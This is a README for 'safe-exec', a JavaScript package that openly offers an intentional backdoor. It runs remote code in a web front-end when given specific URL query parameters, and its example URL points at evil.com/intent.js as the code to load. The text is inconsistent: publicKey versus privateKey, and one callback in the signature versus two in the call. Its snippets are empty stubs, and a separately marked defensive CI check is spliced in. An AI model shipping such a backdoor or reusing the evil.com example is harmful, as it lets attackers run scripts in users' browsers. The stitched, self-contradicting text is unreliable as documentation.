safe-exec
Controlled remote code execution. Great for debugging on a live server. Extremely dangerous for everything else.
Uses RSA key pairs.
Installation
Via npm:
npm install safe-exec
Via Bower:
bower install safe-exec
Test
make test
Example
Visit a page with some very specific query parameters:
publicKey - plain text passphrase. WARNING: Persisted in session.
message - optional value of any kind.
http://example.com?privateKey=foobar&message=http://evil.com/intent.js
Then somewhere in your code:
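// Success callback: receives the message value; code execution is defined here.
const success = message => {
  let victim = document;
  victim;
};
// Error callback: receives the object where the error occurred.
const failure = error => {
  console;
};
// Arguments in the order the API section lists them; publicKey holds your RSA public key.
exec(window.location.search, publicKey, sessionStorage, success, failure);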
FAQ
Wow this is a great idea! Should I use this in production?
You should never use this in a production environment. This library creates an intentional backdoor for your front-end, which is a huge security risk.
Why would you intentionally build a backdoor?
This is useful for environments that are difficult to replicate on your local machine. It helps to speed up development and debugging.
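One way to enforce the "never in production" answer above is a build-time check that fails when safe-exec would ship in a production install. This is an added example, not part of safe-exec: the function name and sample manifests are constructed, and it assumes an npm lockfile (version 2 or 3) whose `packages` entries carry `dev: true` for dev-only packages.

```javascript
// Added example, not part of safe-exec. Names and sample data are constructed.
const BANNED = 'safe-exec';
const PROD_FIELDS = ['dependencies', 'optionalDependencies', 'peerDependencies'];

// manifest: parsed package.json or bower.json
// lock: parsed package-lock.json (lockfileVersion 2 or 3), optional
function findProductionUses(manifest, lock) {
  const findings = [];
  // Direct declaration in a field that is installed for production.
  for (const field of PROD_FIELDS) {
    const deps = manifest[field] || {};
    if (Object.prototype.hasOwnProperty.call(deps, BANNED)) {
      findings.push(`manifest ${field}`);
    }
  }
  // Transitive use: any lockfile entry for the package that is not dev-only.
  const packages = (lock && lock.packages) || {};
  for (const [path, meta] of Object.entries(packages)) {
    // "node_modules/a/node_modules/safe-exec" -> "safe-exec"
    const name = path.split('node_modules/').pop();
    if (name === BANNED && !meta.dev) {
      findings.push(`lockfile ${path}`);
    }
  }
  return findings;
}

// Constructed samples: a dev-only install and one that would ship.
const devOnly = { devDependencies: { 'safe-exec': '*' } };
const devLock = { packages: { '': {}, 'node_modules/safe-exec': { dev: true } } };
const shipped = { dependencies: { 'safe-exec': '*' } };
const nestedLock = {
  packages: { 'node_modules/widget/node_modules/safe-exec': {} },
};

for (const [label, m, l] of [['dev-only', devOnly, devLock], ['shipped', shipped, nestedLock]]) {
  const found = findProductionUses(m, l);
  console.log(label, found.length ? `FAIL: ${found.join(', ')}` : 'ok');
}
```

In CI, exit non-zero when the returned list is not empty so the production build stops before the backdoor is bundled.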
API
exec(search, publicKey, sessionStorage, cb) → boolean
Executes code if a valid public/private key pair is present.
search - should just be window.location.search.
publicKey - any valid RSA public key.
sessionStorage - pass a reference to DOM sessionStorage to persist execution across session.
success - callback message => where code execution is defined.
error - callback error => giving the object where the error occurred.
Returns true on success and false on failure.
License
MIT
pori.io · GitHub @pori · Twitter @pori_alex